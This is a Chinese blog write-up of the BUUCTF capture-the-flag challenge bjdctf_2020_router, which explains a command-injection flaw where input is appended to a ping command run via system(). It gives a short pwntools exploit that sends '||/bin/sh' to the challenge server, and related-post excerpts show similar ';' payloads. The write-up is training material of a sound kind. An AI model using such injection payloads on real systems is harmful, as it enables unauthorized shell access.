bjdctf_2020_router 1

于 2024-03-10 21:26:57 发布
阅读量394 收藏 10
点赞数 9
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/136608941
版权

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
在这里插入图片描述
逻辑很简单,一直打印菜单,但仔细看来只有1有用,别的都是迷惑的,1中的功能先是读入一个0x10大小的字符串buf,然后使用strcat函数将buf拼接在dest后面,那这个dest是什么呢,我们先随便输入一个字符串
在这里插入图片描述
跟据后面的提示想到dest应该是ping,因为ping命令后面什么也不跟会报错。
还有一种方法就是上面已经有了dest的值了
在这里插入图片描述
其值为0x20676E6970,该值就是ping的ascall码形式,连着的两位16进制的数表示一个字符,比如0x20表示的是空格,因为是小端序,字符逆序存放,0x67,0x6e,0x69,0x70
分别对应g,n,i,p。
但对于解题来说刚才有的说的不重要,重要的是能输入字符串然后将其拼接到ping后面执行system命令,所以需要用到逻辑运算符||或&,在buf中先输入||或&,然后再输入’/bin/sh’后就可执行system(‘/bin/sh’)夺权了

3.exp

from pwn import*
p=remote('node5.buuoj.cn',26213)
p.sendline('1')
p.sendline(b'||/bin/sh')
p.interactive()

exp也比较简单

曾经满眼皆是她
关注
BJDCTF2020 router
qq_39980610的博客
08-23 290
BJDCTF2020 router
bjdctf_2020_router
m0sway的博客
11-27 608
bjdctf_2020_router 使用checksec查看: 只开启了栈不可执行,放进IDA中查看,程序逻辑代码都在main()函数中,也是一个菜单类题目 选项2和4是没有用的,来看看1和3: 1中用户可输入0x10大小的string,程序将这个string用system()执行了??????? 3 栈溢出 既然1能直接执行,那就试试直接连上去cat flag吧 当直接使用r.sendline("cat flag")时,可以看到程序其实时已经调用了系统命令ping 接下来只需要绕过ping即可
BUUCTF pwn——bjdctf_2020_router
CNS-Enterprise BCC-1701-J
05-09 287
BUUCTF 做题练习
BUUCTF-bjdctf_2020_router-WP
Rt1Text的博客
02-12 225
64位。
【BUUCTF】bjdctf_2020_router
m0_51251108的博客
12-31 333
【BUUCTF】bjdctf_2020_router linux里面命令可以用;或&分隔,接下来就可以输我们要的命令了
[BUUCTF-pwn]——bjdctf_2020_router
Y_peak的博客
03-16 341
[BUUCTF-pwn]——bjdctf_2020_router 关键漏洞, 如果输入 ; /bin/sh 就会执行system("/bin/sh") 分号是分割符 exploit from pwn import * p = remote("node3.buuoj.cn",27911) p.sendline('1') p.sendafter("Please input the ip address:\n", "; /bin/sh\x00") p.interactive() ...
[BUUCTF]PWN——bjdctf_2020_router
mcmuyanga的博客
11-06 986
bjdctf_2020_router 附件 步骤: 例行检查,64位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 会让我们选择,选择4.root,没什么用,但是注意了,这边选1会执行ping命令,尝试在ping命令后拼接ls,可以看到ls命令也执行了 这边利用了linux下的命令机制,命令1+;+命令2 这样的格式两种指令都会执行 3 . 利用这点,远程连接,尝试读出flag ...
Trace_Router.zip_route_router _router tra_trace_trace router
09-19
标题中的"Trace_Router.zip_route_router _router tra_trace_trace router"暗示了这是一个关于网络路由追踪的软件包,可能是一个用于追踪数据包在网络中路径的工具。描述进一步确认了这一点,指出它是一个实现...
rtl.tar.gz_Verilog router_router _router verilog_router vhdl_rou
09-14
This is RTL of Router by uisng verilog
Using_Linux_As_A_Router.rar_router
09-24
Using Linux As A Router
145-将 ext_net 连接到 router1
08-08
数据包首先通过`router100_101`连接vlan101的接口(172.16.101.1)发送,然后通过连接`ext_net`的接口(10.10.10.2)转发出去,最终到达10.10.10.1。 在数据包从`router`的外网接口`qg-cf54d3ea-6a`发出时,会执行...
rust_road_router
06-28
Rust 路由框架和工具包有两个板条箱。该引擎是一个包含多种路由算法和实用程序的库,用于处理路由数据。...有关更多信息,请参阅相应 crate 的自述文件。此外,还有一个lib目录,其中包含InertialFlowCutter ,这是一个...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8489
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于龙伯格(Luenberger)观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型
10-06
基于龙伯格(Luenberger)观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型 通过龙伯格观测器,我们可以在不直接测量转子角度的情况下,通过已知的电机电流、电压来估算转子角度。这种方法在控制理论和实际电机控制中具有广泛的应用,尤其是在无传感器的情况下。
web端实现《别踩白块》小游戏
10-06
通过JS实现web的《别踩白块》小游戏
python经典实例代码汇总+100例
最新发布
10-06
python经典实例代码汇总+100例
深入理解Zend Framework:Zend_Controller_Router路由解析
"这篇教程详细解析了Zend Framework中的路由功能组件`Zend_Controller_Router`,涵盖了该组件的原理、使用方法以及注意事项,旨在帮助开发者更好地理解和应用这一关键特性。" 在Zend Framework中,路由功能是应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值